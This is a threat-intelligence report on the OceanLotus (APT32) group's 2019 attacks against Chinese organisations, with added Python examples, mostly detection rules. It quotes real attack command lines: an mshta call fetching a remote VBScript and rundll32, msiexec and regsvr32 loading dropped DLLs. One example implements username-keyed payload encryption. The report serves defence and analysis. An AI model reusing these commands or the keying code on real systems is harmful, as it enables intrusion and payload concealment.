Attack activity of the OceanLotus group, identified as originating from Vietnam, against China
18 Dec

According to Tencent's cyber security threat intelligence center, in the first half of 2019 the OceanLotus group attacked a wide range of targets in China, including government agencies, maritime authorities, diplomatic agencies, large state-owned enterprises, scientific research organizations and a number of large private enterprises.

Through tracking, Tencent found that a large number of domestic targets were attacked by this group: in several cases the target's entire intranet was compromised and a large amount of confidential information and server configuration data was stolen. The attackers appear to be very familiar with China, including its current affairs and government structure. For example, as soon as a tax reform was launched, a tax reform plan was used as the lure of an attack.

Sea Lotus (OceanLotus), also known as APT32, is a cyber attack group that many organizations have identified as originating from Vietnam. Since its emergence, the group has attacked targets in China as well as in many other countries around the world.

The attack methods have not changed much since the group was first detected, but small improvements in decoys, payloads and evasion of security layers continue to appear. After gaining control of a machine, the attackers scan the entire network. This shows that an APT attack does not stop until it reaches its goal: as long as the target remains valuable, the attack keeps intensifying.

Characteristics of the attack

Attack by phishing email

Sea Lotus sends emails that impersonate reputable organizations, so that users are easily tricked into downloading the malicious files themselves. Throughout 2019 many such phishing emails were sent, for example:

The accounts used to send the phishing emails are usually NetEase mailboxes. The compromised accounts typically look like: Sun**@126[.]com, Yang**@163[.]com, insert**@126[.]com ...

Diversified decoys
The group diversifies the decoys used in its attacks, and almost every decoy type has been seen. Besides malicious lnk, doc and chm files, WinRAR ACE archives exploiting CVE-2018-20250 are mentioned in many reports.

Malicious doc file:

Chm decoy file:

WinRAR vulnerability (CVE-2018-20250):

Various ways of delivering the malicious file
Because the phishing decoys vary, the way the malicious payload is downloaded and executed also varies.

Direct execution

An executable is disguised as a DOCX file with the Microsoft Word icon to trick the user into downloading and running it. In the document-based variant, the content shown after the file is opened is deliberately garbled, enticing the victim to enable the macro code in the document in order to read it. In fact, even after macros are enabled, no normal content is ever displayed.

Use Rundll32 to run the malicious DLL
After the initial malicious code runs, it drops and executes the real payload {1888B763-A56C-4D4B-895C-2092993ECCBA}.dll in the C:\Users\Administrator\AppData\Local\Microsoft folder, and then uses rundll32 to run the DLL through its Register export:

"C:\Windows\system32\rundll32.exe" "C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll",Register

Macro execution, with the obfuscated macro code:

Execute malicious shellcode in Office memory
The macro code decodes the shellcode directly inside the Office process and creates a thread to execute it in memory:

Use DLL side-loading
The DLL side-loading technique is used to execute and download malicious files:


Registering the malicious DLL as a system component to execute it:

Embedded command file
When the chm file is opened, it prompts the user to run ActiveX code:

Script content of file:

However, because of an encoding issue, the chm content appears truncated when opened:


After decompression, the original content is as follows:

Persistence through scheduled tasks
After the chm runs, it drops the file bcdsrv.dll under %AppData% (C:\Users\<user>\AppData\Roaming) and then creates a scheduled task named WeeklyMaintenance:

Execution command:

C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll

The -Y switch makes msiexec call the module's DllRegisterServer export, so the task simply loads bcdsrv.dll, which is the actual malicious file.

lnk file that calls mshta

Detailed analysis of the lnk technique that calls mshta

Once the shortcut is executed, it runs the command:

C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html

news.html is in fact a VBScript file containing the executable code.

Use odbcconf.exe to load the file
odbcconf.exe ships with the operating system and can be used to load and execute a DLL. Because the host process is a signed system binary, this can bypass some security software:

WinRAR ACE vulnerability (CVE-2018-20250)
An archive exploiting this vulnerability is structured as follows: besides extracting the normal files, decompression also writes a self-extracting file into the Startup folder (C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup):

This file is a self-extracting program. When it runs at startup, it drops the file {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx and then runs the command:

regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx
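The commands quoted in the sections above (rundll32 on a GUID-named DLL under AppData, msiexec -Y registering a DLL, mshta fetching a remote URL, odbcconf loading a DLL, regsvr32 /s /i on a dropped .ocx) all abuse signed Windows binaries, so a process-creation log is the natural place to catch them. The following Python is an added example written for this page, not code from Tencent or from the malware. It runs a handful of rules over constructed process-creation events modelled on the commands in this report; the odbcconf command line and the benign counterparts are hypothetical.

```python
import re
from typing import Dict, List, Tuple

# Directories a normal user can write to; the payloads on this page are dropped under AppData.
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|programdata|users\\public|windows\\temp)\\", re.I)
# GUID-named module, e.g. {1888B763-A56C-4D4B-895C-2092993ECCBA}.dll
GUID_MODULE = re.compile(
    r"\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}\.(?:dll|ocx)", re.I)
REMOTE_URL = re.compile(r"\bhttps?://", re.I)
# msiexec /y or -y <module> calls the module's DllRegisterServer export.
MSIEXEC_REGISTER = re.compile(r"(?:^|\s)[-/]y(?:\s|$)", re.I)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path (accepts / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Names of the rules a process-creation event matches; empty for benign events."""
    image = image_name(event.get("image", ""))
    cmd = event.get("command_line", "")
    hits: List[str] = []
    if image == "rundll32.exe":
        if ".dll" in cmd.lower() and USER_WRITABLE.search(cmd):
            hits.append("rundll32_dll_from_user_writable_dir")
        if GUID_MODULE.search(cmd):
            hits.append("rundll32_guid_named_module")
    elif image == "msiexec.exe":
        if ".dll" in cmd.lower() and MSIEXEC_REGISTER.search(cmd):
            hits.append("msiexec_registers_dll")
    elif image == "mshta.exe":
        if REMOTE_URL.search(cmd):
            hits.append("mshta_remote_url")
    elif image == "regsvr32.exe":
        if GUID_MODULE.search(cmd) or USER_WRITABLE.search(cmd):
            hits.append("regsvr32_suspicious_module")
    elif image == "odbcconf.exe":
        if "regsvr" in cmd.lower():
            hits.append("odbcconf_regsvr")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """(index, matched rules) for every event that matched at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]


# Constructed process-creation events: the first five follow the commands quoted in this
# report (the odbcconf path is hypothetical); the last three are benign look-alikes.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\system32\rundll32.exe",
     "command_line": r'"C:\Windows\system32\rundll32.exe" "C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll",Register'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll"},
    {"image": r"C:\Windows\SysWOW64\mshta.exe",
     "command_line": r"C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx"},
    {"image": r"C:\Windows\System32\odbcconf.exe",
     "command_line": r"odbcconf.exe /a {REGSVR C:\Users\Public\update.dll}"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi /qn"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["command_line"][:60], "->", hits)
```

The rules key on what the page actually shows (a user-writable drop directory, a GUID file name, a remote URL, the register switch) rather than on the binary name alone, so the benign rundll32, msiexec and mshta invocations in the sample stay silent.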

Multi-stage loading
In the latest attacks Sea Lotus uses a multi-stage loader. In previous attacks, the RAT was executed directly after the shellcode was decoded, for example:

Now, after the shellcode is decoded, it first tries to download and execute a further stage; only if the download fails does it load the embedded RAT:

This makes the attack activity richer and more varied, and also gives the attackers more control over it.

Evasion of security software
Sea Lotus also uses a variety of methods to evade security software, mainly:

Using DLL side-loading to execute
Using system executables
For example odbcconf.exe, as described above.

Executing shellcode directly inside the Office process
Adding junk data to inflate the file size
To prevent samples from being collected by security vendors, Sea Lotus deliberately adds a large amount of junk data to the resources of certain files to inflate their size.

A file padded with junk data in this way can reach 61.4 MB (64,480,256 bytes):
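Padding a sample with junk pushes it past the upload size limits of many sandboxes and sample-sharing pipelines, and makes every padded copy hash differently. The Python below is an added example for this page, not the report's or the malware's code: it profiles a file by chunk compressibility, counts the filler, and hashes only the non-filler chunks so that samples differing only in the amount of filler can still be correlated. The sample bytes are constructed here (a 64 KiB pseudo-random stand-in for the real payload followed by 1 MiB of zero filler). The test only catches repetitive filler; random high-entropy filler would have to be located by parsing the PE resource directory instead.

```python
import hashlib
import random
import zlib
from typing import Dict


def looks_like_filler(chunk: bytes, max_ratio: float = 0.1) -> bool:
    """True if the chunk deflates to under max_ratio of its size, i.e. it is repetitive junk.

    Code, compressed or encrypted data stays near ratio 1.0; zero runs and repeated
    patterns collapse to a few bytes. Random filler is not detected by this test.
    """
    if not chunk:
        return False
    return len(zlib.compress(chunk, 1)) / len(chunk) < max_ratio


def padding_profile(data: bytes, chunk_size: int = 65536) -> Dict[str, object]:
    """Count filler chunks and hash only the non-filler chunks (the 'core')."""
    core = hashlib.sha256()
    chunks = padded = 0
    for offset in range(0, len(data), chunk_size):
        chunk = data[offset:offset + chunk_size]
        chunks += 1
        if looks_like_filler(chunk):
            padded += 1
        else:
            core.update(chunk)
    return {
        "size": len(data),
        "chunks": chunks,
        "padded_chunks": padded,
        "padding_ratio": padded / chunks if chunks else 0.0,
        "core_sha256": core.hexdigest(),
    }


def _pseudo_random(n: int, seed: int = 7) -> bytes:
    """Deterministic high-entropy bytes standing in for a real (packed) payload."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed stand-in: 64 KiB of pseudo-random "payload" plus 1 MiB of zero filler.
PAYLOAD = _pseudo_random(65536)
PADDED_SAMPLE = PAYLOAD + b"\x00" * (1024 * 1024)

if __name__ == "__main__":
    for name, blob in (("payload only", PAYLOAD), ("padded sample", PADDED_SAMPLE)):
        print(name, padding_profile(blob))
```

A core hash computed this way is stable across differently padded copies of the same build, which is what a vendor needs when the full-file hash is useless for deduplication.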

Creating the backdoor
The backdoor file is encrypted and customized using properties of the victim's computer. Therefore the file hash differs on every machine, and the file cannot be decoded without information about the machine that contained the backdoor. Even if the sample is recovered by security vendors, the payload cannot be decoded as long as no data about the infected computer is available.

Disguising the C2 connection
Depending on the configuration, different connection patterns and disguises are possible: the C2 address is assembled at runtime and then resolved. C2 hostnames usually have the following structure (xxx is the configured C2 domain):

{rand}.xxx

cdn.xxx

api.xxx

Fake HTTP headers:

Custom backdoor
One of the most notable techniques used by Sea Lotus in 2019 (mainly for the second-stage backdoor) is that the malicious file dropped on each victim machine is encrypted using properties of that computer (such as the hostname) and only then executed. Without part of that information, the payload cannot be decoded.

Therefore every dropped file is different, and even if it is collected by a security vendor, the actual payload cannot be decoded as long as the victim's related data is missing.

The backdoor is also executed through DLL side-loading with file pairs such as AdobeUpdate.exe + goopdate.dll, KuGouUpdate.exe + goopdate.dll, XGFileCheck.exe + goopdate.dll, SogouCloud.exe + inetmib1.dll, and other combinations.
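Side-loading (also listed under "Use DLL side-loading" above) works because a trusted, signed host executable loads a DLL of the expected name from its own directory before looking anywhere else. In an image-load log (Sysmon event 7 records the loading process, the loaded image and its signature status) the tell-tale is a well-known DLL name appearing outside its normal location, beside an unexpected host. The Python below is an added example, not code from the report or from Tencent; the expected-directory baseline is an assumption an analyst would maintain from a clean reference machine, and the events are constructed around the pairs named above.

```python
import ntpath
from typing import Dict, List

# Where these modules legitimately live (assumed baseline; extend it from a clean machine).
EXPECTED_DIRS = {
    "goopdate.dll": (r"c:\program files\google\update",
                     r"c:\program files (x86)\google\update"),
    "inetmib1.dll": (r"c:\windows\system32", r"c:\windows\syswow64"),
}
# Host executables this report names as side-loading vehicles.
WATCHED_HOSTS = {"adobeupdate.exe", "kugouupdate.exe", "xgfilecheck.exe", "sogoucloud.exe"}


def check_image_load(event: Dict[str, object]) -> List[str]:
    """Reasons an image-load event looks like DLL side-loading; empty when it looks normal."""
    proc_dir, proc_name = ntpath.split(str(event["process"]).lower())
    dll_dir, dll_name = ntpath.split(str(event["image_loaded"]).lower())
    reasons: List[str] = []
    expected = EXPECTED_DIRS.get(dll_name)
    if expected and not any(dll_dir.startswith(prefix) for prefix in expected):
        reasons.append(f"{dll_name} loaded from unexpected directory {dll_dir}")
    if proc_name in WATCHED_HOSTS and dll_dir == proc_dir:
        reasons.append(f"{proc_name} loaded {dll_name} from its own directory")
    if expected and not event.get("signed", True):
        reasons.append(f"{dll_name} carries no valid signature")
    return reasons


# Constructed image-load events: two side-loads built from the pairs in this report
# (drop directories are hypothetical) and two legitimate loads of the same DLL names.
SAMPLE_LOADS = [
    {"process": r"C:\Users\Public\Libraries\AdobeUpdate.exe",
     "image_loaded": r"C:\Users\Public\Libraries\goopdate.dll", "signed": False},
    {"process": r"C:\ProgramData\Sogou\SogouCloud.exe",
     "image_loaded": r"C:\ProgramData\Sogou\inetmib1.dll", "signed": False},
    {"process": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",
     "image_loaded": r"C:\Program Files (x86)\Google\Update\1.3.36.31\goopdate.dll", "signed": True},
    {"process": r"C:\Windows\System32\snmp.exe",
     "image_loaded": r"C:\Windows\System32\inetmib1.dll", "signed": True},
]

if __name__ == "__main__":
    for load in SAMPLE_LOADS:
        print(load["process"], "->", check_image_load(load) or "ok")
```

The first rule is the one that generalises: any DLL with a known home loaded from a user-writable directory is worth a look, whatever the host process is called, because the actor can rename the host at will.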

The decoding process is:

The example below shows that the username was used for the encryption.

The victim's username is Cao**, which shows that the trojan was generated specifically to infect this computer.
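To make the "keyed to the victim" property concrete, here is an added Python illustration of environmental keying, written for this page; it is not OceanLotus's actual algorithm, and the key label, the choice of HMAC-SHA256 as keystream and MAC, and the use of the redacted name Cao** as the sample account are all assumptions. The key is derived from the account name, the payload is encrypted and authenticated under it, and decryption under any other account fails outright. The last function shows the analyst's side: because the key input is a low-entropy value such as a username, a candidate list gathered from the victim environment is enough to recover the stage, which is exactly why the report stresses that data about the infected computer is needed.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple

NONCE_LEN, TAG_LEN = 16, 32
KEY_LABEL = b"env-keyed-loader|"   # arbitrary domain-separation label (assumption)


def derive_key(username: str) -> bytes:
    """Key bound to the victim's account name, the property the report says was used."""
    # Windows account names are case-insensitive, so normalise before hashing.
    return hashlib.sha256(KEY_LABEL + username.lower().encode("utf-16-le")).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode, producing `length` bytes."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal(payload: bytes, username: str, nonce: Optional[bytes] = None) -> bytes:
    """Encrypt-then-MAC the payload under the username-derived key."""
    key = derive_key(username)
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    ciphertext = bytes(p ^ k for p, k in zip(payload, _keystream(key, nonce, len(payload))))
    tag = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + tag + ciphertext


def unseal(blob: bytes, username: str) -> Optional[bytes]:
    """Return the payload, or None when the account (hence the key) is wrong or the blob is damaged."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        return None
    nonce = blob[:NONCE_LEN]
    tag = blob[NONCE_LEN:NONCE_LEN + TAG_LEN]
    ciphertext = blob[NONCE_LEN + TAG_LEN:]
    key = derive_key(username)
    expected = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None   # on any other machine the stage stays opaque
    return bytes(c ^ k for c, k in zip(ciphertext, _keystream(key, nonce, len(ciphertext))))


def recover(blob: bytes, candidates: Iterable[str]) -> Optional[Tuple[str, bytes]]:
    """Analyst side: try account names collected from the victim environment until one verifies."""
    for name in candidates:
        payload = unseal(blob, name)
        if payload is not None:
            return name, payload
    return None


# Constructed demonstration; the report's redacted victim name stands in for the real one.
STAGE = b"\x4d\x5a" + b"second-stage backdoor (placeholder bytes)"
VICTIM_BLOB = seal(STAGE, "Cao**", nonce=b"\x00" * NONCE_LEN)  # fixed nonce only for reproducibility

if __name__ == "__main__":
    print("on the victim account:", unseal(VICTIM_BLOB, "cao**") is not None)
    print("on an analyst box:", unseal(VICTIM_BLOB, "analyst"))
    print("with a candidate list:", recover(VICTIM_BLOB, ["administrator", "alice", "Cao**"]))
```

Two consequences follow for triage. A dropped blob that fails to verify on a sandbox is not corrupt, it is keyed; and the keying input must be collected alongside the sample (hostname, account name, or whatever property the loader reads), otherwise the second stage is lost even though the loader itself is in hand.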

Through monitoring, it was found that Sea Lotus mainly uses three types of malware: Cobalt Strike's Beacon trojan, a modified Denis trojan, and the Ghost family. Cobalt Strike Beacon and Denis are found most often; Ghost is rarely used.



Modified Ghost:

Moving through the network
After a machine has been infected via the phishing email, Sea Lotus continues the attack against internal machines, scanning, searching and attacking them in as many ways as possible.

Dumping credential hashes:

Packaging files:

Scheduled tasks are also created to keep downloading tools through PowerShell:

The downloaded malicious file was detected as goopdate.dll.

Other activities

During tracking, several attacks similar to Sea Lotus attacks were found, such as:

The malicious code was ultimately executed by two kinds of payload:

A Beacon payload generated by Cobalt Strike.
A Metasploit reverse_http payload block.
In addition, the C2 servers of these attacks are often located in China:

Although these recent attacks resemble Sea Lotus activity, some of their behaviors differ from those of Sea Lotus.

Summary of Sea Lotus
Sea Lotus is one of the most active APT groups of recent years, regularly attacking targets in China and in countries around the world. Many cyber security companies have repeatedly published reports on recent Sea Lotus attacks. The group shows no sign of stopping and keeps updating its attack techniques, causing many difficulties for defenders. Users therefore need to raise their security awareness, not execute attachments from unknown emails, and not be fooled by phishing messages.

Safety recommendations

  • Raise security awareness: do not open attachments from unknown emails unless the source is reliable and the purpose is clear, and do not enable Office macros lightly.
  • Install operating system patches and patches for important software such as Office in a timely manner.
  • Use antivirus software to block attacks such as trojans.
  • Users and businesses should deploy an early threat detection capability such as a SOC; the SOC is currently the first choice of security vendors.

Related IOCs


Source: mp.weixin.qq.com
